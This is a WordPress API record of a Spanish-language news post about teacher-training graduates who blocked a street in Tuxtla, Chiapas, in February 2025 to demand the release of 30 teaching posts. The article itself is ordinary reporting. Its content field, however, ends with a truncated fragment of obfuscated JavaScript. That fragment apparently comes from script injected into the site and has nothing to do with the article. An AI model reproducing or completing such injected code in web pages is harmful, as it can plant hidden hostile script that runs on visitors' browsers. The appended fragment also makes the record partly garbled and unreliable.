{"id":20480,"date":"2025-02-20T04:11:39","date_gmt":"2025-02-20T04:11:39","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20480"},"modified":"2025-02-20T04:11:40","modified_gmt":"2025-02-20T04:11:40","slug":"exigen-liberacion-de-plazas-egresados-normalistas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20480","title":{"rendered":"Exigen liberaci\u00f3n de plazas egresados normalistas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250219-WA0034-1024x768.jpg\" alt=\"\" class=\"wp-image-20481\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250219-WA0034-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250219-WA0034-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250219-WA0034-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250219-WA0034.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>19 de febrero del 2025. Egresados de diferentes escuelas normales del estado realizaron una protesta bloqueo en el coraz\u00f3n de Tuxtla para exigir la liberaci\u00f3n de las plazas docentes del proceso de admisi\u00f3n 2024-2025.<\/p>\n\n\n\n<p>En su manifestaci\u00f3n realizaron un bloqueo en el cruce de Calle y Avenida Central para dar a conocer que desde el pasado mes de agosto tendr\u00eda que haberse designado estos espacios laborales para los egresados.<\/p>\n\n\n\n<p>Detallaron que, en anteriores ocasiones han sostenido reuniones con funcionarios estatales sin embargo, no han tenido respuesta a pesar de haber cumplido con todo el proceso requerido.<\/p>\n\n\n\n<p>Este grupo est\u00e1 exigiendo 30 plazas, aunque existe un grupo indeterminado de egresados que est\u00e1n en espera de una plaza magisterial.<\/p>\n\n\n\n<p>\u201cDijo que en el pasado mes de diciembre del 2024 les hab\u00edan notificado que liberar\u00edan estas plazas estatales del nivel secundarias, pero de nueva cuenta fuimos enga\u00f1ados, todo ha sido muy lento\u201d, coment\u00f3.<\/p>\n\n\n\n<p>Dentro de los pretextos que las autoridades educativas han dado es que el ISSTECH es el que est\u00e1 atrasando este proceso, \u201cotro fue que debido al cambio de gobierno y por ello se hab\u00eda frenado pero los meses han pasado y no se ha tenido avance\u201d.<\/p>\n\n\n\n<p>Agreg\u00f3 que no se tiene un n\u00famero exacto de plazas que se est\u00e1n demandando pero son cientos de j\u00f3venes y egresados que est\u00e1n en esta misma situaci\u00f3n.<\/p>\n\n\n\n<p>\u201cSomos diferentes grupos que estamos en esta situaci\u00f3n, y cada uno se ha manifestado por separado, pero hay una gran demanda\u201d, indic\u00f3.<\/p>\n\n\n\n<p>De acuerdo con los manifestantes, \u201cestamos conscientes que no a todos nos va tocar plazas pero lo que pedimos es que aumente el n\u00famero en relaci\u00f3n al a\u00f1o pasado, por eso hacemos el llamado a las autoridades para que atiendan esta demanda\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 19 de febrero del 2025. Egresados de diferentes escuelas normales del estado realizaron una protesta bloqueo en el coraz\u00f3n de Tuxtla para exigir la liberaci\u00f3n de las plazas docentes del proceso de admisi\u00f3n 2024-2025. En su manifestaci\u00f3n realizaron un bloqueo en el cruce de Calle y Avenida Central para dar a conocer que &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20481,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20480","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20480","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20480"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20480\/revisions"}],"predecessor-version":[{"id":20482,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20480\/revisions\/20482"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20481"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20480"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20480"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20480"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}